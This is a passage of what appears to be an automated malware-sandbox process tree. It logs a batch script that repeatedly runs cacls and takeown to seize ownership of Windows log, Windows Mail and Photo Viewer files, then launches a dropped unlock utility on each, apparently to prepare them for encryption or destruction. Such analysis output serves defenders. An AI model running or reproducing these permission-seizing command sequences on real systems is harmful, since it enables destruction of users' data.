                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.37f1f5c4-8d32-4284-ab37-6dbf80cd2a48.1.etl" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.37f1f5c4-8d32-4284-ab37-6dbf80cd2a48.1.etl"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "WuProvider.37f1f5c4-8d32-4284-ab37-6dbf80cd2a48.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula "WuProvider.37f1f5c4-8d32-4284-ab37-6dbf80cd2a48.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.bda22bdb-c801-484f-b511-de7b9396c516.1.etl""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.bda22bdb-c801-484f-b511-de7b9396c516.1.etl" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.bda22bdb-c801-484f-b511-de7b9396c516.1.etl"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "UpdateSessionOrchestration.bda22bdb-c801-484f-b511-de7b9396c516.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula "UpdateSessionOrchestration.bda22bdb-c801-484f-b511-de7b9396c516.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.1.etl""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.1.etl" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.1.etl"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula "MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5152
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5900
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.976f7965-9895-4b24-a009-135468883582.1.etl""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.976f7965-9895-4b24-a009-135468883582.1.etl" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.976f7965-9895-4b24-a009-135468883582.1.etl"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "WuProvider.976f7965-9895-4b24-a009-135468883582.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula "WuProvider.976f7965-9895-4b24-a009-135468883582.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5452
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "wab.exe" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula "wab.exe" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.1.etl""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.1.etl" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.1.etl"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5376
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula "MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.976f7965-9895-4b24-a009-135468883582.1.etl""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.976f7965-9895-4b24-a009-135468883582.1.etl" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.976f7965-9895-4b24-a009-135468883582.1.etl"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "WuProvider.976f7965-9895-4b24-a009-135468883582.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula "WuProvider.976f7965-9895-4b24-a009-135468883582.1.etl" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
